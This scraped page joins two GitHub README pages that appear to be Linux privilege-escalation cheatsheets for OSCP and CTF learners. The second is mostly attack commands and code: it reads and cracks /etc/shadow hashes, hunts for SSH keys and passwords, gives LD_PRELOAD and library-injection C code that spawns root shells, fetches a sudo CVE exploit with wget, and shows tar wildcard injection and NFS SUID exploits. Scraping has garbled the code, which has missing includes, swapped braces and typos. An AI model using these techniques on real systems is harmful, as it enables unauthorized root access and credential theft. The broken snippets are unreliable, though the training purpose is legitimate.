- Saved searches
- Use saved searches to filter your results more quickly
- Ignitetechnologies/Linux-Privilege-Escalation
- Name already in use
- Sign In Required
- Launching GitHub Desktop
- Launching GitHub Desktop
- Launching Xcode
- Launching Visual Studio Code
- Latest commit
- Git stats
- Files
- README.md
- About
- Saved searches
- Use saved searches to filter your results more quickly
- ZeusBanda/Linux_Priv-Esc_Cheatsheet
- Name already in use
- Sign In Required
- Launching GitHub Desktop
- Launching GitHub Desktop
- Launching Xcode
- Launching Visual Studio Code
- Latest commit
- Git stats
- Files
- README.md
Saved searches
Use saved searches to filter your results more quickly
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.
This cheatsheet is aimed at the OSCP aspirants to help them understand the various methods of Escalating Privilege on Linux based Machines and CTFs with examples.
Ignitetechnologies/Linux-Privilege-Escalation
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Sign In Required
Please sign in to use Codespaces.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
Latest commit
Git stats
Files
Failed to load latest commit information.
README.md
Linux Privilege Escalation Cheatsheet
This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples. There are multiple ways to perform the same task. We have performed and compiled this list based on our experience. Please share this with your connections and direct queries and feedback to Hacking Articles.
- Abusing Sudo Rights
- SUID Binaries
- Capabilities
- Lxd Privilege Escalation
- Docker Privilege Escalation
- Exploiting Cron jobs
- Writable /etc/passwd File
- Misconfigured NFS
- Exploiting Wildcard
- LD_Preload Privilege Escalation
- Exploiting PATH Variable
- Python Library Hijacking
- Polkit (CVE 2021-3560)
- PwnKit (CVE 2021-4034)
- DirtyPipe (CVE 2022-0847)
About
This cheatsheet is aimed at the OSCP aspirants to help them understand the various methods of Escalating Privilege on Linux based Machines and CTFs with examples.
Saved searches
Use saved searches to filter your results more quickly
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.
ZeusBanda/Linux_Priv-Esc_Cheatsheet
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Sign In Required
Please sign in to use Codespaces.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
Latest commit
Git stats
Files
Failed to load latest commit information.
README.md
Linux Privilege Escalation Cheat Sheet
hostname uname -a cat /proc/version cat /etc/issue lscpu
whoami id sudo -l cat /etc/passwd cat /etc/passwd | cut -d : -f 1 cat /etc/shadow cat /etc/group
ifconfig ip a ip route arp -a ip neigh
Kernel Exploit Enumeration
hostname uname -a cat /etc/lsb-release cat /proc/version cat /etc/os-release cat /etc/issue lscpu
Check Running Process Information
Kernel Exploitation Process
- Google for Exploits against the OS and Kernel Version
- Download, compile, and run it against the target if it exists
- Try something else if it does not exist.
Escalation via Password & File Permissions
A password may be stored in the bash history
grep --color=auto -rnw '/' -ie "PASSW" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSW" <> /dev/null \;
ls -la /etc/passwd ls -la /etc/shadow
cat -la /etc/passwd cat -la /etc/shadow
unshadow passwd_File> shadow_file> https://hashcat.net/wiki/doku.php?id=example_hashes .\hashcat64.exe -m hash_typw> unshadowed_file> .\rockyou.txt -O
find / -name authorized_keys 2> /dev/null find / -name id_rsa 2> /dev/null
- Research GTFOBins for the binary
- If nothing is found search for root privilege escalation
#include #include #include void_init() < unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); >
gcc -fPIC -shared -o shall.so shell.c -nostartfiles
sudo LD_PRELOAD=Path/to/>shell.so binary we can run as sudo> wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c -O exploit.c
find / -perm -u=s -type f 2>/dev/null - Check GTFOBins for SUID and find a suitable binary
- Run the code associated with the binary and SUID
find / -type f -perm -04000 -ls 2>/dev/null strace path/to/binary> 2>&1 | grep -i -E "open|access|no such file" #include #include static void inject() __atribute__((constructor)) < system(" cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); >
gcc -shared -fPIC -o path/to/opened/file_found_with_strace> path/to/exploit.c> Binary Symlinks in nginx with CVE-2016-1247
find / -type f -perm -04000 -ls 2>/dev/null - Run the Linux Exploit Suggester
- Find CVE-2016-1247
- Check the nginx log files for rwx in the folder
./nginxed-root.sh /var/log/nginx/error.log
find / -type f -perm -04000 -ls 2>/dev/null - run the binary and check the strings, if it only calls the service continue, if it calls the full path skip to 6
echo 'int main() < setgid(0); setuid(0); system("/bin/bash"); return 0; >' > /tmp/service.c gcc /tmp/service.c -o /tmp/service
function to binary>() < cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; > export -f path to binary>
Escalation via Capabilities
- Find binaries with cap_setuid+ep
- Check GTFObins for Capabilities
- Run the command found in GTFObins
path of binary> command to root> Escalation via Scheduled Tasks
cat /etc/crontab crontab -l ls -lah /var/spool/cron ls -lah /etc/cron* cat /etc/at.allow cat /etc/at.deny systemctl list-timers --all Escalation via Cron Paths
- Check the PATH= Variable.
- Check what files are being run.
- Check if the file exists in the file path from left to right.
- If it does not exist, check if you can write the file i. Create The File With:
echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > / chmod +x
If a command accepts wildcards as an argument and it is present in the crontab or cronjob do the following:
- Research the executable
- Create files where the name of the file if fed as part of the argument
- The executable will interpret the name of the file as part of the command
- Profit
Tar is a good example of this with the payloads
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > root.sh chmod +x root.sh
touch --checkpoint=1 touch --checkpoint-action=exec=sh\root.sh When a backup is done, the files are interpreted as tar arguments.
mkdir /tmp/mount mount -o rw,vers=2 IP>:mount> /tmp/mount echo 'int main() < setgid(0); setuid(0); syste,("/bin/bash"); return 0; >' > /tmp/mount/exploit.c gcc /tmp/mount/exploit.x -o /tmp/mount/exploit chmod +s /tmp/mount/exploit